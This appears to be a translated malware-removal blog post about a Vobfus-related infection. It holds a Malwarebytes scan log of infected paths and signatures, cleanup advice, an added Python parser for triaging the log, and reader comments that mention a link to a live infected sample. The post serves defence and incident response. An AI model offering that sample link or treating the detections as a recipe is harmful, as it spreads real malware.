c:\WINDOWS\login.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\mdm.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\setup.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\avp.exe (Malware.Packer.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\gdi32.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\lsass.exe (Malware.Packer.Gen) -> No action taken.
c:\RECYCLER\s-1-5-21-0243936033-3052116371-381863308-1811\vsbntlo.exe (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\tuozeu.exe (Heuristics.Shuriken) -> No action taken.
c:\RECYCLER\r-1-5-21-1482476501-1644491937-682003330-1013\acleaner.exe (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\application data\10.tmp (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\application data\11.tmp (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\application data\2.tmp (Trojan.Proxy) -> No action taken.
c:\documents and settings\Mak\application data\3.tmp (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\application data\4.tmp (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\application data\4E.tmp (Trojan.Proxy) -> No action taken.
c:\documents and settings\Mak\application data\4F.tmp (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\application data\5.tmp (Trojan.Proxy) -> No action taken.
c:\documents and settings\Mak\application data\50.tmp (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\application data\6.tmp (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\application data\7.tmp (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\application data\8.tmp (Trojan.Proxy) -> No action taken.
c:\documents and settings\Mak\application data\9.tmp (Trojan.Proxy) -> No action taken.
c:\documents and settings\Mak\application data\A.tmp (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\application data\B.tmp (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\application data\C.tmp (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\application data\D.tmp (Malware.Gen) -> No action taken.
c:\documents and settings\mak\application data\xbvmvj.exe (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\Bureau\test (Malware.Gen) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\E.tmp (Rootkit.TDSS) -> No action taken.
c:\documents and settings\Mak\local settings\Temp\lq2nx49orufbhdi2.exe (Malware.Packer.Gen) -> No action taken.
c:\WINDOWS\Temp\eais\setup.exe (Trojan.Downloader) -> No action taken.
c:\documents and settings\Mak\dgjdd.exe (Malware.Gen) -> No action taken.
c:\RECYCLER\s-1-5-21-0243936033-3052116371-381863308-1811\Desktop.ini (Trojan.Agent) -> No action taken.
c:\WINDOWS\system32\lowsec\local.ds (Stolen.data) -> No action taken.
c:\WINDOWS\system32\lowsec\user.ds (Stolen.data) -> No action taken.
c:\RECYCLER\r-1-5-21-1482476501-1644491937-682003330-1013\Desktop.ini (Worm.AutoRun.Gen) -> No action taken.

Malwarebytes handles most of the malware in this pack (Trojan.Ertfor, Trojan.Vobfus, Backdoor.Win32.Floder).

Vobfus reinstalls TDSS/Alureon at every boot, so you must have killed Vobfus before running TDSSKiller.

Finally, clean your USB drives with USBFix so as not to reinfect the computer.
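As an added example (not code from malekal.com), a small Python parser for the Malwarebytes log format shown above, deriving what a responder checks before trusting the cleanup: whether entries were actually removed rather than only scanned, the safe value to restore for the hijacked .exe file association, and which of the tools above the findings call for. SAMPLE_LOG, the function names and the step wording are constructed for this example.

```python
"""Added example (not malekal.com's code): parse a Malwarebytes' Anti-Malware 1.50 log in the
format shown above and derive the checks that decide the cleaning order. SAMPLE_LOG is
constructed from the page's log lines (one entry altered to look remediated)."""
import re
from collections import Counter

SAMPLE_LOG = r"""Processus mémoire infecté(s):
c:\documents and settings\Mak\local settings\application data\vrw.exe (Trojan.FakeAlert) -> 3256 -> No action taken.
Elément(s) de données du Registre infecté(s):
HKEY_CLASSES_ROOT\exefile\shell\open\command\(default) (Broken.OpenCommand) -> Bad: ("C:\Documents and Settings\Mak\Local Settings\Application Data\vrw.exe" -a "%1" %*) Good: ("%1" %*) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.
Dossier(s) infecté(s):
c:\RECYCLER\r-1-5-21-1482476501-1644491937-682003330-1013 (Worm.AutoRun.Gen) -> No action taken.
Fichier(s) infecté(s):
c:\documents and settings\Mak\local settings\Temp\E.tmp (Rootkit.TDSS) -> No action taken.
c:\WINDOWS\system32\lowsec\user.ds (Stolen.data) -> Quarantined and deleted successfully.
"""

# One detection line: <item> (<signature>) -> [<pid> ->] [Bad: (..) Good: (..) ->] <action>.
ENTRY = re.compile(
    r"^(?P<item>.+?) \((?P<sig>[A-Za-z0-9.]+)\) -> (?:(?P<pid>\d+) -> )?"
    r"(?:Bad: \((?P<bad>.*?)\) Good: \((?P<good>.*?)\) -> )?(?P<action>.+?)\.?$")
SECTION = re.compile(r"^(?P<name>[^:]+):\s*$")  # section headers end with a colon

def parse_mbam_log(text):
    """Return one dict per detection line, tagged with the section it sits under."""
    entries, section = [], None
    for line in text.splitlines():
        if m := SECTION.match(line):
            section = m.group("name")
        elif m := ENTRY.match(line):
            entries.append({"section": section, **m.groupdict()})
    return entries

def triage(entries):
    """Was anything actually removed, is .exe launching still wrapped, which tools are needed."""
    sigs = Counter(e["sig"] for e in entries)
    exe_key = r"hkey_classes_root\exefile\shell\open\command"
    hijack = next((e for e in entries if e["item"].lower().startswith(exe_key)), None)
    return {
        "unremediated": sum(e["action"] == "No action taken" for e in entries),
        "by_signature": sigs,
        "exe_open_command_good": hijack["good"] if hijack else None,  # value to restore
        "rogue_present": any(s.startswith("Trojan.FakeAlert") for s in sigs),
        "rootkit_present": any(s.startswith("Rootkit.TDSS") for s in sigs),
        "autorun_worm_present": any(s.startswith("Worm.AutoRun") for s in sigs),
    }

def cleaning_steps(report):
    """Map the triage onto the tool order the page recommends."""
    steps = ["boot into Safe Mode with Networking"]
    if report["rogue_present"]:
        steps.append("run RogueKiller first: the rogue can block Malwarebytes")
    steps.append("run Malwarebytes and remove; a log full of 'No action taken' is only a scan")
    if report["rootkit_present"]:
        steps.append("run TDSSKiller only once Vobfus is gone, since it reinstalls TDSS")
    if report["autorun_worm_present"]:
        steps.append("clean USB drives with USBFix before plugging them back in")
    return steps
```

Run against the full log above, every entry comes back "No action taken", which is the scan-only state the parser flags before any tool is trusted.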


5 thoughts on “Vofbus : méga pack”

  1. Hello Malekal,

    Allow me a quick comment. I don't know much about computers, but looking at the HijackThis log I saw that the VM used was running IE 6… so I'm wondering why run the tests with such a browser rather than another one like FF or IE8 …

    Thanks in advance.

  2. I am stunned that not one of the antivirus engines on VirusTotal detected a single piece of malware from this pack… but maybe that's because this malware isn't, strictly speaking, a virus?..

  3. @malekalmorte:
    OK, and on the page you point to, the download link is not a fix, it really is an infected file?
